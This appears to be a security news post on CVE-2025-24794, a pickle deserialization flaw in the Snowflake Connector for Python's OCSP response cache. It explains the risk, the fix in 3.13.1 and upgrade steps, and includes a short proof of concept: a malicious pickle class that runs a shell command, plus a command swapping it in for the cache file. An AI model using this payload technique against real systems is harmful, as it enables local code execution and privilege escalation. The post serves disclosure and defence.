CVE CyberSecurity Database News

CVE-2025-24794 - How a Pickle Flaw in Snowflake Connector for Python Opened the Door to Local Attacks

Poster -

The Snowflake Connector for Python is a popular tool that allows Python applications to connect to the Snowflake cloud data platform. It’s widely used for data engineering, analytics, and all sorts of enterprise applications. But recently, security researchers at Snowflake themselves found a critical flaw in how the connector handled a crucial part of its security checks—the OCSP (Online Certificate Status Protocol) response cache. This flaw could have let attackers with local access to a system escalate their privileges.

Let’s break down what happened, why it was dangerous, how to check if you’re vulnerable, and how to protect yourself. We’ll keep the language simple and direct.

What is CVE-2025-24794?

CVE-2025-24794 is a vulnerability that affects the Snowflake Connector for Python versions 2.7.12 through 3.13..

Risk: Pickle can execute arbitrary code when loading untrusted data.

- Impact: A user with local access could exploit the cache file to run code as the user running the application, potentially leading to local privilege escalation.

Good news: The flaw is patched in version 3.13.1 and above.

1. The OCSP Response Cache

To save on network requests, the connector caches OCSP responses (which help confirm the validity of certificates). The cache was stored as a file on disk, serialized using the Python pickle module.

2. Why Pickle is Dangerous

The pickle module can serialize any Python object, but it can also execute code while loading data. If an attacker can replace or tamper with the cache file, the next time it is loaded, they can trigger arbitrary code execution.

They replace the OCSP cache file with one containing malicious code.

- When a privileged user (or a service running as another user) next runs the connector, the code in the pickle file is executed.

Proof of Concept: How an Attacker Might Exploit This

Below is an example of what a malicious pickle payload might look like.

Step 1: Crafting a Malicious Pickle

import pickle
import os

class Evil:
    def __reduce__(self):
        return (os.system, ('id > /tmp/pwned',))

with open('/tmp/ocsp_cache_pwned', 'wb') as f:
    pickle.dump(Evil(), f)

This creates a pickle file that, when loaded, runs the shell command id > /tmp/pwned.

Step 2: Replace the Real Cache

If the application stores its OCSP response cache in, say, /home/target/.cache/ocsp_cache, the attacker replaces it:

mv /tmp/ocsp_cache_pwned /home/target/.cache/ocsp_cache

Step 3: Trigger the Exploit

The next time the Snowflake Connector for Python is used, and tries to load the OCSP cache, the malicious code runs as the target user, potentially allowing further exploitation or privilege escalation.

Connector version: If you’re using 2.7.12 to 3.13., you are at risk.

- File system permissions: If untrusted users can write to your OCSP cache directory, you’re more exposed.
- Shared systems: Systems running JupyterHub, shared servers, or any machine with multiple users are at higher risk.

Check your version

import snowflake.connector
print(snowflake.connector.__version__)

How Did Snowflake Fix It?

The fix landed in Snowflake Connector for Python 3.13.1. The developers replaced pickle with a safer serialization format, such as json, for the cache, which won't support arbitrary code execution.

Upgrade right away

pip install --upgrade snowflake-connector-python

References

- Snowflake Security Advisory for CVE-2025-24794
- Snowflake Connector for Python Release Notes

Upgrade to at least Snowflake Connector for Python 3.13.1.

- Review file system permissions on multi-user systems—don’t let users overwrite each other’s cache files.

Timeline

Published on: 01/29/2025 21:15:21 UTC